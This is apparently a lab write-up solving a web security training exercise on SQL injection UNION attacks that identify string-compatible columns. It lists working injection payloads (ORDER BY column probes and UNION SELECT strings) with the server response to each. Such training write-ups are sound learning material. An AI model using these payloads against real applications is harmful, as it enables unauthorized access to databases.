INFO LAB :

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a Lab: SQL injection UNION attack, determining the number of columns returned by the query . The next step is to identify a column that is compatible with string data.

The lab will provide a random value that you need to make appear within the query results.

GOAL : → To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

Solution :

We need to know How many Columns in database

' ORDER BY 1,2,3--    > 200 ok 
' ORDER BY 4--        > 500 internal server error

we will try to retrieve data

' UNION SELECT NULL,NULL,NULL--            > 200 OK

Now the different between Two labs is this Step :

We need to returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

it’s just Depending on change the parameter we will put string in value of it

' UNION SELECT 'hacker',NULL,NULL--           > 500 internal server error
' UNION SELECT NULL,'hacker',NULL--           > 200 Ok 
' UNION SELECT NULL,NULL,'hacker'--           > 500 internal server error

The lab need from us replace the word → ‘hacker’ with UJ3drF

Every lab has different wordUJ3drF

Screenshot_2025-04-14_03-11-03.png

Screenshot_2025-04-14_03-11-26.png

🎉 Congrats! You’ve solved the lab! 🎉